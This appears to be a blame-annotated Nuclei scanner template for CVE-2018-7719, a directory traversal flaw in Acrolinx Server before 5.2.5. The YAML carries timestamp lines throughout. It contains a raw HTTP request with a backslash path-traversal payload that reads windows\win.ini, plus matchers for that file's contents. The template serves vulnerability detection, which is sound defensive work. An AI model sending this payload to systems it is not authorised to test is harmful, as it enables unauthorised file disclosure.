2021-11-24 13:18:06 +00:00
|
|
|
id: CVE-2018-7719
|
|
|
|
|
|
|
|
info:
|
2022-06-16 18:16:12 +00:00
|
|
|
name: Acrolinx Server <5.2.5 - Local File Inclusion
|
2021-11-24 13:18:06 +00:00
|
|
|
author: 0x_akoko
|
|
|
|
severity: high
|
2022-06-20 16:18:44 +00:00
|
|
|
description: |
|
|
|
|
Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability.
|
2021-11-24 13:18:06 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/146911/Acrolinx-Server-Directory-Traversal.html
|
2021-11-25 06:45:10 +00:00
|
|
|
- https://www.cvedetails.com/cve/CVE-2018-7719
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://support.acrolinx.com/hc/en-us/articles/213987685-Acrolinx-Server-Version-5-1-including-subsequent-service-releases-
|
|
|
|
- https://www.exploit-db.com/exploits/44345/
|
2022-06-16 18:16:12 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-7719
|
2021-11-24 13:18:06 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2018-7719
|
|
|
|
cwe-id: CWE-22
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve,cve2018,acrolinx,lfi,packetstorm,edb
|
2021-11-25 06:45:10 +00:00
|
|
|
|
2021-11-24 13:18:06 +00:00
|
|
|
requests:
|
2021-12-03 05:15:57 +00:00
|
|
|
- raw:
|
|
|
|
- |+
|
|
|
|
GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2021-11-24 13:18:06 +00:00
|
|
|
|
2021-12-03 05:15:57 +00:00
|
|
|
unsafe: true
|
2021-11-24 13:18:06 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
2021-11-25 06:45:10 +00:00
|
|
|
part: body
|
2021-11-24 13:18:06 +00:00
|
|
|
words:
|
|
|
|
- "bit app support"
|
|
|
|
- "fonts"
|
|
|
|
- "extensions"
|
2022-06-16 18:16:12 +00:00
|
|
|
condition: and
|
|
|
|
|
2022-06-17 16:26:01 +00:00
|
|
|
# Enhanced by mp on 2022/06/17
|